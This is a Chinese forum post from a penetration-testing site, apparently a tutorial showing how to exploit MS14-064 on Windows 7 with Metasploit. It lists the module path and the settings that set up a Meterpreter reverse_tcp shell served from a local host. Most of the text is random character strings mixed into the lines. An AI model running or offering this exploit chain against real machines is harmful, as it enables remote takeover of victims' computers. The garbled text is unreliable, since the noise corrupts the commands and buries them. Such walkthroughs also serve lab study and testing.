中国网络渗透测试联盟

标题: MS14-064 漏洞测试入侵win7 [打印本页]
作者: admin    时间: 2018-10-20 20:20
标题: MS14-064 漏洞测试入侵win7

5 \+ q& N8 a' J7 l, e* s! `0 \ 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示+ M8 s, P: J! T: V9 `8 k

# n9 B& \, n3 |9 b* c3 a5 O

) E" C& {$ z5 t/ p 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: ! O7 A/ n* y& j. |

* X: {- P1 } Q+ S4 _! K

$ Q! [. C/ J, [) |" ?( i: q# w 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp 2 y) h2 t# n6 w* o% B$ [

. K' C% Y4 \6 v2 |& r

+ _5 H+ }3 p1 h4 u! ^' H9 Q6 c             set AllowPowershellPrompt true f' k7 g6 B: f$ q4 v5 C0 U

a5 g2 r. t4 ]" R

& C/ ]- A: [" d/ d: ^2 A! @" I; _             Set LHOST 192.168.0.1099 Z2 N; S' R0 d8 l( @! p

5 p% D, v6 Y: F6 w1 v+ A1 N- F

u! G5 L7 d: _8 v9 C: u# Z: u7 N             set SRVHOST 192.168.0.109 % k2 |$ w) e2 F: @1 S

( l( o5 J& b& H' j1 O9 R- S

9 X2 ]; ^% S6 X n2 K2 H+ Z9 a             Set uripath share ' G ~) l6 L% y) y2 z

( D% I W. e0 @6 A% F

: d9 s& c, r5 u             Set srvport 809 t5 F. W$ Q0 ~

- G; U0 }9 a O b7 O

3 ?8 B& Y$ l7 J  % K0 y# z* g# G/ q

/ H* N+ c% n6 D. o6 y% r0 @+ S

7 A7 Y+ k F T" |6 e   ) ], D+ B& Q. T/ w) L

7 A7 n) E- J' o( y. f: A

: ]: W; f7 h0 y* B) X   . ], I% k% V; |' O6 ?

/ @3 q% a; r7 Y7 O8 j

( P2 V/ t& W X# L  % q3 @/ A- y; `

Z! {; N9 a8 R2 w6 i: u

, [, `- G7 R \3 D& z& \   3 @# Q |) e6 ?% ~3 i0 f# e. \

7 @ ^9 J+ X5 q: n5 i

9 w7 J3 S' k" h! e- T; z( ? 下面我们来访问本地地址如图:/ d( z: I% \; E- E% b

, D7 d9 V7 F( P

9 S9 q! z6 e7 }6 x3 T! r# f  ' T4 E4 w6 W9 m i# y

" r/ \2 H* O' w3 \8 R7 Q) L

( E) ?$ B# m2 m# e  ; T6 _. r9 u3 |" G

3 u! f: S! R6 a0 e8 [

5 ^6 a0 X9 a! _7 x b0 {. N1 z7 B- g! T" D' e- @0 I* t8 J





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2